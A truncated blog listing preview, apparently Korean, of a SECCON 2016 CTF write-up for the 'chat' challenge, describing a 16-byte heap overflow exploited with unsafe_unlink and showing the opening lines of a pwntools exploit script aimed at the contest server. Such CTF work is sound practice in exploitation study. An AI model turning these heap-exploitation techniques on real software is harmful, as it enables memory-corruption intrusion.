SECCON 2016 chat 요약: change name 할때 16바이트 힙오버. next chunk 메타데이타를 덮을수있음. unsafe_unlink 써서 임의메모리쓰기해서 익스.summary: 16byte heap overflow in change_name. use unsafe_unlink and get write-what-where. from pwn import *context.arch = 'amd64'# i386 / armr = remote('chat.pwn.seccon.jp', 26895)raw_input('attach')print r.recvuntil('menu > ') def adduser(name): r.sendline('1') print r.recvuntil('name > ') r.sendline(name) prin.. 더보기 이전 1 ··· 5 6 7 8 9 10 11 ··· 423 다음